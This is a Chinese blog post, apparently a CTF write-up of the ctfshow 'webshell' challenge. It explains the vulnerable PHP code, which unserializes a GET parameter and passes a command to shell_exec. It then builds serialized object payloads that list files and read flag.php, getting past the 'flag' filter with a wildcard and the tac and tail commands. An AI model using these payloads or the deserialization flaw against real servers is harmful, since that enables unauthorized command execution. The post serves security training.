ctfshow菜狗 web webshell

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量447 收藏 4
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hypocrite2/article/details/130744529
版权

 <?php 
    error_reporting(0);

    class Webshell {
        public $cmd = 'echo "Hello World!"';

        public function __construct() {
            $this->init();
        }

        public function init() {
            if (!preg_match('/flag/i', $this->cmd)) {        #这里的i表示忽略大小写
                $this->exec($this->cmd);
            }
        }

        public function exec($cmd) {
            $result = shell_exec($cmd);
            echo $result;
        }
    }

    if(isset($_GET['cmd'])) {
        $serializecmd = $_GET['cmd'];
        $unserializecmd = unserialize($serializecmd);
        $unserializecmd->init();
    }
    else {
        highlight_file(__FILE__);
    }

?> 

提供的代码是一个PHP脚本,看起来是一个Webshell。Webshell是一种恶意脚本,可以上传到Web服务器上,以获取未经授权的访问和对服务器的控制。它允许攻击者在服务器上执行任意命令,并可能进行恶意活动。

让我们逐步分解代码:

error_reporting(0) 这一行将错误报告级别设置为0,这意味着不会显示任何PHP错误或警告。这通常在恶意脚本中使用,以隐藏可能暴露Webshell存在的任何错误。

代码定义了一个名为 Webshell 的类。它有一个公共属性 $cmd,其初始值为 'echo "Hello World!"'。

__construct() 方法是类的构造函数,它调用 init() 方法。

init() 方法检查 $cmd 变量中的字符串是否不包含大小写不敏感的子字符串 "flag"。如果条件为真,则调用 exec() 方法,传递 $cmd 的值。

exec() 方法使用 shell_exec() 函数执行命令,并将结果打印输出。

如果通过GET请求传递了名为 cmd 的参数,代码将尝试对参数进行反序列化,并调用 $unserializecmd->init() 方法。否则,代码将显示自身的源代码


php在线工具
https://www.baidu.com/link?url=iQEnbsG20g-idYW1OwoZEuyAGLm06JW72edz3flliss9rYjCL7JOyLKKwD9GaIa6&wd=&eqid=814264de0005f4ab0000000464631855

根据代码逻辑
创建一个Webshell类的实例$test
然后通过_construct()函数传入cmd的参数,这里设置cmd=ls
最后使用 serialize() 函数将该实例序列化并输出。
在php代码里添加以下

$test = new Webshell();
$test->cmd = 'ls';
echo serialize($test);

Q:为什么不能这样传参?
$test = new Webshell($cmd='ls');
echo serialize($test);
因为构造函数_construct()的形式

可以把构造函数改成下面这样,上面的传参语句就对了
public function __construct($cmd = 'echo "Hello World!"') {
        $this->cmd = $cmd;
        $this->init();
    }

得到的结果里
</code>Hello World!
O:8:"Webshell":1:{s:3:"cmd";s:2:"ls";}
了解到它的格式,字母O,8位,“Webshell”,1,s,3位,cmd,s,位数,“真正想执行的命令”
输入网页:
http://e40be2e3-c4ce-401a-8ece-5fea5a399148.challenge.ctf.show/
?cmd=O:8:"Webshell":1:{s:3:"cmd";s:2:"ls";}
得到目录信息:
flag.php index.php


O:8:"Webshell":1:{s:3:"cmd";s:6:"tac f*";} 
这里用tac命令,然后由于在源码中看到,不能直接用flag,所以用f*来模糊匹配
这里tac是逆序输出,从最后一行开始
$flag = 'xxxxxxxxxxxxxx'; */ # @link: https://ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-04 00:14:17 # @Last Modified by: h1xa # @Date: 2020-09-04 00:14:07 # @Author: h1xa # -*- coding: utf-8 -*- /*

O:8:"Webshell":1:{s:3:"cmd";s:7:"tail f*";}
# @Author: h1xa # @Date: 2020-09-04 00:14:07 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:14:17 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $flag = 'xxxxxxxxxxxxxx';

tac和tail可以打开,不知道为什么不能用cat和head命令打开文件?

hypocrite2
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
WebShell 路人甲WEB管理 v1.3
11-10
路人甲WEB管理具有WebShell批量检测、批量执行命令、批量查询百度权重,百度收录,正确率可达百分之九十八,是一款不可多得的必备神器。路人甲WEB管理功能介绍:打开软件后将存有
PHP实现webshell扫描文件木马的方法
01-20
可扫描 weevelyshell 生成 或加密的shell 及各种变异webshell 目前仅支持php 支持扫描 weevelyshell 生成 或加密的shell 支持扫描callback一句话shell 支持各种php大马 <!DOCTYPE html> <html> <head&...
【CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1307
文件上传漏洞学习笔记,ctfshow题目为依托
ctfshow菜狗webshell wp
arcuied
12-11 764
ctfshow菜狗webshell wp
CTFSHOW-WEB详解
qq_49422880的博客
05-25 4774
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
CTFSHOW 菜狗杯--WEB
weixin_45908624的博客
01-09 2959
CTFShow--菜狗杯--web
2022CTFSHOW菜狗杯部分题目(三)
weixin_40103894的博客
11-16 1703
一层一层一层地剥开我的♥-ctfshow 【RAR文件头修复|docx|文件分离|base100】 0宽字符加密-ctfshow 我的眼里只有$-ctfshow 【变量覆盖】 webshell-ctfshow 【php反序列化】
【CTFSHOW_菜狗杯】Webshell
qq_48932191的博客
01-20 504
Webshell类复制出来,然后改一下要运行的cmd。这里因为题中过滤了flag所以用通配符“*”替代。反序列化,输入字符串经过反序列化实现命令执行。
caidao.rar_caidao web_webshell_入侵检测系统
09-15
web系统管理工具,用于入侵检测,中国开发者使用。
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
php木马webshell扫描器代码
12-18
复制代码 代码如下: <?php /* +————————————————————————–+ | Codz by ...程序配置 =====================*/ $dir=’cms’; //设置要扫描的目录 $jumpoff=false;... //设置要跳过检查的文件或
CTFshow 2022 菜狗WEB WP补充
starttv的博客
11-14 1959
得到源码,分析发现push会将自定义内容md5加密之后作为文件名上传到/plugins/目录上,内容可控。先给number2赋字母,会出现一个报错界面,给number1和operator赋的话会提示错误,应该是这两个参数有过滤,而number2没有。在控制台输入Game回车,把score修改,然后回到游戏点击开始,只要吃掉一个苹果你就会发现分数已经修改成功。分析源码,发现它将文件名拼接到了cmd里,没有进行任何过滤,可以在文件后传入命令。flag=0,发现内容为空,尝试把flag=0改为1,得到。
CTFshow 菜狗web方向 全
Jay17的博客
09-01 2347
CTFshow 菜狗web方向 全
CTFshow 2022 菜狗杯部分WEB WP
starttv的博客
11-13 1758
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
CTFshow-菜狗杯WP
m0_61155226的博客
11-14 5713
然后得到了压缩包中的音频文件,然后发现文件后缀为.wav而不是原本的.mp3,猜测需要使用Silent eye工具 Sound qualit选择high,然后就得到flag啦。这里发现成功破除伪加密(也可以手动修改破伪加密),然后通过文件头判断压缩包中的文件类型为.pyc,并修改文件后缀名为.pyc(否则在线工具无法正常反编译;打开链接发现是看图识美女,要通过30关;访问链接发现是探姬的福利视频(bushi),然后根据提示的摩斯密码不难猜测到黑丝为1,白色为0,然后分割标志为视频的转场动画,
ctfshow菜狗webwp
qq_63928796的博客
11-14 2072
比如b=cookie[a],所以post[b]然后令post等于c所以get[c],令get=d所以request[d]最后补上前面的数字就是request[d],最后执行的就是eval(d[6][0][7][5][8][0][9][4][4]);可以看到源码对于输入的限制是两个正则,要求要么是数字,要么是dir(gmpy2)中的内容。根据源码可知,address是用AES的ECB模式加密的,稍微查一下就可以知道,ECB模式一组密文对应一组明文,也就是说,可以通过改变密文的顺序从而改变解密后明文的顺序。
ctf.show文件包含(web78-web117)
wanan的博客
08-31 453
ctf.show文件包含(web78-web117)
ctfshow web入门 命令执行
qq_53263789的博客
07-19 1464
ctfshow
ctfshow菜狗webshll
09-04
很抱歉,我无法提供关于CTFShow菜狗Webshll的信息,因为这超出了我的知识范围。CTFShow菜狗杯是一个CTF竞赛,而Webshll据我所了解是一个WebShell工具。WebShell是一种用于远程管理和控制网站的工具,但它也可能被黑客用于非法活动。对于具体的CTF比赛内容以及相关工具的使用和提权信息,我无法提供帮助。建议您查阅相关的CTF竞赛资料或者向专业的CTF从业者咨询获取更详细的信息。<span class="em">1</span> #### 引用[.reference_title] - *1* [webshll提权工具包](https://download.csdn.net/download/zxc819338209/3872270)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值